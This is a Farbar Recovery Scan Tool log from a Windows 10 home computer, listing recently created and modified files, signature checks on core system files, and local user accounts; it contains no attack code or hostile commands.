2016-01-15 00:24 - 2016-01-15 00:24 - 00242768 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFNHK64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00232704 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSH64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00225504 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00220136 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSHP64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00201000 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00176480 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00128512 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00120720 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00105720 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFComm64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00103160 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFSAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102136 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFDAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102128 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFHAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00100544 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097976 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097912 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00093144 _____ (Virage Logic Corporation / Sonic Focus) C:\WINDOWS\SysWOW64\SFCOM.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 72212512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
2016-01-15 00:20 - 2016-01-15 00:20 - 03204352 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02902264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2016-01-15 00:20 - 2016-01-15 00:20 - 02058880 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioEQ64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02038904 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 01194856 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSstCApoPropPage.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00267208 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00131016 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2016-01-14 19:58 - 2016-01-14 19:58 - 00027740 _____ C:\Users\sesay\Documents\giftbox.3mf
2016-01-13 22:52 - 2016-01-13 22:52 - 00045864 _____ C:\Users\sesay\Downloads\CurrentEvent-AhmadSesay.pdf
2016-01-13 21:39 - 2016-01-04 21:51 - 07477600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-01-13 21:39 - 2016-01-04 21:50 - 00671472 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2016-01-13 21:39 - 2016-01-04 21:45 - 02587696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:42 - 02026736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 02544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 01299504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00858952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00245840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00234504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:36 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-01-13 21:39 - 2016-01-04 21:33 - 02180128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00701384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00208176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00116728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:27 - 01594408 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01804664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01309376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 00786696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:23 - 00119320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:21 - 01371792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:17 - 00695752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:16 - 00100160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:52 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00472576 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-01-13 21:39 - 2016-01-04 20:50 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 01582080 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2016-01-13 21:39 - 2016-01-04 20:49 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:49 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00749056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:48 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:48 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00604672 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00584704 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-01-13 21:39 - 2016-01-04 20:41 - 01070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:41 - 00558592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:40 - 00890880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:40 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:38 - 00389120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:30 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:29 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 07826432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:25 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-01-13 21:38 - 2016-01-04 21:51 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-01-13 21:38 - 2016-01-04 21:51 - 01141496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-01-13 21:38 - 2016-01-04 21:48 - 00499432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2016-01-13 21:38 - 2016-01-04 21:31 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-01-13 21:38 - 2016-01-04 21:24 - 00796352 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMSRoamingSecurity.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:56 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2016-01-13 21:38 - 2016-01-04 20:54 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys
2016-01-13 21:38 - 2016-01-04 20:54 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-01-13 21:38 - 2016-01-04 20:53 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:50 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-13 21:38 - 2016-01-04 20:48 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:47 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:44 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:43 - 00953856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-01-13 21:38 - 2016-01-04 20:43 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-01-13 21:38 - 2016-01-04 20:42 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-01-13 21:38 - 2016-01-04 20:39 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:30 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-13 21:29 - 2016-01-13 21:29 - 00000000 __SHD C:\found.000
2016-01-10 15:27 - 2016-01-10 15:27 - 00001646 _____ C:\Users\sesay\Desktop\Store.lnk
2016-01-05 15:29 - 2016-01-05 15:29 - 05797102 _____ C:\WINDOWS\system32\igdclbif.bin
2016-01-05 15:29 - 2016-01-05 15:29 - 00041296 _____ C:\WINDOWS\system32\iglhxc64_dev.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00040931 _____ C:\WINDOWS\system32\iglhxo64_dev.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00040343 _____ C:\WINDOWS\system32\iglhxo64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00040316 _____ C:\WINDOWS\system32\iglhxc64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00039798 _____ C:\WINDOWS\system32\iglhxg64_dev.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00039658 _____ C:\WINDOWS\system32\iglhxg64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00004778 _____ C:\WINDOWS\system32\iglhxs64.vp
2016-01-05 15:29 - 2016-01-05 15:29 - 00001125 _____ C:\WINDOWS\system32\iglhxa64.vp
2016-01-05 15:28 - 2016-01-05 15:28 - 00826090 _____ C:\WINDOWS\system32\DisplayAudiox64.cab
2016-01-03 13:04 - 2016-01-03 13:04 - 00001829 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-01-03 13:04 - 2016-01-03 13:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-01-03 13:03 - 2016-01-03 13:04 - 00000000 ____D C:\Program Files\iTunes
2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files\iPod
2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-01-03 13:01 - 2016-01-14 22:31 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Local\Apple Computer
2016-01-03 13:00 - 2016-01-03 13:00 - 00001921 _____ C:\Users\Public\Desktop\QuickTime Player.lnk
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\Users\MuhammadAkim\AppData\LocalLow\Apple Computer
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\Program Files (x86)\QuickTime
2016-01-03 12:59 - 2016-01-03 12:59 - 00000000 ____D C:\Users\sesay\AppData\Roaming\WildTangent
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-31 19:47 - 2015-11-08 19:36 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-31 19:41 - 2015-10-30 02:26 - 00405360 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-31 19:20 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-31 19:19 - 2015-03-25 08:26 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-01-31 19:11 - 2015-08-16 16:58 - 00000000 ____D C:\Users\sesay\Documents\Youcam
2016-01-31 19:11 - 2015-08-16 16:57 - 00000000 ___RD C:\Users\sesay\OneDrive
2016-01-31 19:10 - 2015-12-07 03:57 - 00000000 ____D C:\Users\sesay
2016-01-31 19:10 - 2015-12-07 03:53 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-01-31 19:10 - 2015-11-08 19:36 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-31 19:10 - 2015-08-16 16:54 - 00000000 __SHD C:\Users\sesay\IntelGraphicsProfiles
2016-01-31 16:43 - 2015-08-18 17:57 - 00000000 ____D C:\Users\hakim\Documents\Youcam
2016-01-31 16:42 - 2015-08-18 17:54 - 00000000 __SHD C:\Users\hakim\IntelGraphicsProfiles
2016-01-31 14:28 - 2015-08-16 12:43 - 00000000 ____D C:\Users\abang\Documents\Youcam
2016-01-31 14:26 - 2015-08-16 16:41 - 00002374 _____ C:\Users\abang\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-01-31 14:26 - 2015-08-16 16:41 - 00000000 ___RD C:\Users\abang\OneDrive
2016-01-31 14:25 - 2015-12-07 03:57 - 00000000 ____D C:\Users\abang
2016-01-31 14:24 - 2015-08-16 12:02 - 00000000 __SHD C:\Users\abang\IntelGraphicsProfiles
2016-01-30 23:37 - 2015-12-07 03:57 - 00000000 ____D C:\Users\hakim
2016-01-30 21:05 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\rescache
2016-01-30 20:50 - 2015-12-07 03:53 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2016-01-30 20:50 - 2015-10-30 02:21 - 00000000 ____D C:\WINDOWS\INF
2016-01-30 13:52 - 2015-10-30 02:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-29 17:00 - 2015-12-07 03:57 - 00972168 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-29 16:57 - 2015-10-30 01:28 - 00032768 ___SH C:\WINDOWS\system32\config\ELAM
2016-01-29 16:24 - 2015-12-07 04:20 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-28 23:19 - 2015-10-30 01:28 - 02883584 ___SH C:\WINDOWS\system32\config\BBI
2016-01-28 23:19 - 2015-08-16 16:52 - 00017614 _____ C:\bdlog.txt
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-01-28 23:18 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-01-28 21:47 - 2015-11-08 19:36 - 00002279 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-28 21:47 - 2015-11-08 19:36 - 00002267 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-28 21:43 - 2015-08-16 21:31 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Skype
2016-01-28 19:50 - 2015-08-16 20:00 - 00001137 _____ C:\Users\sesay\Desktop\nativelog.txt
2016-01-28 18:44 - 2015-08-16 17:00 - 00000000 ____D C:\Users\sesay\AppData\Roaming\.minecraft
2016-01-28 17:09 - 2015-09-11 20:54 - 00004160 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{C88485DF-0CD3-4055-9814-20A1ED4A410F}
2016-01-28 14:46 - 2015-11-17 17:45 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-28 11:25 - 2015-10-30 02:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-27 17:46 - 2015-08-16 16:54 - 00000000 ____D C:\Users\sesay\AppData\Local\Packages
2016-01-27 11:39 - 2015-12-23 09:06 - 00000000 ____D C:\Users\sesay\AppData\Local\Screencast-O-Matic-v2
2016-01-26 21:52 - 2015-11-17 17:56 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-01-26 14:10 - 2015-08-16 21:31 - 00000000 ____D C:\ProgramData\Skype
2016-01-25 17:26 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-25 17:25 - 2015-09-01 18:47 - 00000000 ____D C:\Program Files\Java
2016-01-25 17:21 - 2015-08-16 17:03 - 00000000 ____D C:\Users\sesay\AppData\Roaming\InstallShield Installation Information
2016-01-25 17:20 - 2015-11-26 21:57 - 00000000 ____D C:\ProgramData\SkySaga Infinite Isles
2016-01-25 17:19 - 2015-02-11 23:22 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-23 17:26 - 2015-12-18 19:47 - 00000000 ____D C:\Users\sesay\AppData\Local\Gameo
2016-01-23 14:49 - 2015-11-08 19:35 - 00000000 ____D C:\Users\sesay\AppData\Local\Google
2016-01-22 15:20 - 2015-09-01 18:47 - 00000000 ____D C:\Users\sesay\.oracle_jre_usage
2016-01-22 11:50 - 2015-12-07 03:53 - 00012493 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2016-01-22 11:50 - 2015-12-07 03:53 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-01-21 11:19 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Oracle
2016-01-21 11:18 - 2015-09-01 18:47 - 00110176 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge-64.dll
2016-01-21 11:18 - 2015-09-01 18:47 - 00000000 ____D C:\Users\MuhammadAkim\.oracle_jre_usage
2016-01-21 08:51 - 2015-10-30 02:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-01-21 08:48 - 2015-08-18 20:17 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-01-19 23:15 - 2015-08-07 17:02 - 06588344 _____ (Intel Corporation) C:\WINDOWS\system32\igdusc64.dll
2016-01-19 23:14 - 2015-08-07 17:02 - 26305920 _____ (Intel Corporation) C:\WINDOWS\system32\igd11dxva64.dll
2016-01-19 23:14 - 2015-08-07 17:02 - 13937888 _____ (Intel Corporation) C:\WINDOWS\system32\igd10iumd64.dll
2016-01-19 23:12 - 2015-12-07 03:53 - 00103944 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.DLL
2016-01-19 23:12 - 2015-12-07 03:53 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2016-01-19 23:12 - 2015-08-07 16:58 - 07886296 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\igdkmd64.sys
2016-01-19 23:12 - 2015-08-07 16:58 - 02059272 _____ (Intel Corporation) C:\WINDOWS\system32\igfxLHM.dll
2016-01-19 23:12 - 2015-08-07 16:58 - 00750600 _____ (Intel Corporation) C:\WINDOWS\system32\igfxDH.dll
2016-01-19 23:12 - 2015-08-07 16:58 - 00387080 _____ (Intel Corporation) C:\WINDOWS\system32\igfxDI.dll
2016-01-19 23:12 - 2015-08-07 16:58 - 00373720 _____ (Intel Corporation) C:\WINDOWS\system32\igfxCUIService.exe
2016-01-19 23:12 - 2015-08-07 16:58 - 00354784 _____ (Intel Corporation) C:\WINDOWS\system32\igfxEM.exe
2016-01-19 23:12 - 2015-08-07 16:58 - 00301528 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\IntelCpHeciSvc.exe
2016-01-19 23:12 - 2015-08-07 16:58 - 00269272 _____ (Intel Corporation) C:\WINDOWS\system32\igfxHK.exe
2016-01-15 00:24 - 2015-08-14 18:25 - 03309264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 03075784 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00950600 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00731088 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00461272 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00203432 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2016-01-15 00:20 - 2015-08-14 18:24 - 04695288 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2016-01-15 00:20 - 2015-08-14 18:24 - 00032392 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2016-01-14 23:37 - 2015-12-07 06:46 - 00000000 ____D C:\Windows.old
2016-01-14 22:32 - 2015-08-18 17:45 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Roaming\Skype
2016-01-14 22:32 - 2015-08-15 19:36 - 00000000 ____D C:\Users\MuhammadAkim\Documents\Youcam
2016-01-14 22:31 - 2015-12-20 08:45 - 00000000 ____D C:\Users\MuhammadAkim\AppData\Roaming\Apple Computer
2016-01-14 22:31 - 2015-08-15 19:33 - 00000000 __SHD C:\Users\MuhammadAkim\IntelGraphicsProfiles
2016-01-13 23:05 - 2015-09-16 18:55 - 00000000 ___RD C:\Users\sesay\3D Objects
2016-01-13 21:43 - 2015-08-16 18:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-01-13 21:40 - 2015-08-16 18:55 - 143671360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-01-13 21:31 - 2015-08-16 21:31 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-01-03 13:09 - 2015-12-06 19:46 - 00000000 ____D C:\Users\sesay\AppData\Local\Apple Computer
2016-01-03 13:03 - 2015-12-06 19:45 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-01-02 20:40 - 2015-10-30 02:26 - 00826872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
 
==================== Files in the root of some directories =======
 
2015-08-16 12:09 - 2015-08-16 12:09 - 0509256 _____ () C:\ProgramData\1439744800.bdinstall.bin
 
Some files in TEMP:
====================
C:\Users\sesay\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\sesay\AppData\Local\Temp\jre-8u71-windows-au.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-01-23 12:09
 
==================== End of FRST.txt ============================
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by MuhammadAkim (2016-01-31 19:57:32)
Running from C:\Users\sesay\Desktop
Windows 10 Home (X64) (2015-12-07 09:29:14)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
abang (S-1-5-21-1436452318-2580999886-2786755032-1002 - Limited - Enabled) => C:\Users\abang
Administrator (S-1-5-21-1436452318-2580999886-2786755032-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1436452318-2580999886-2786755032-503 - Limited - Disabled)
Guest (S-1-5-21-1436452318-2580999886-2786755032-501 - Limited - Disabled)
hakim (S-1-5-21-1436452318-2580999886-2786755032-1005 - Limited - Enabled) => C:\Users\hakim
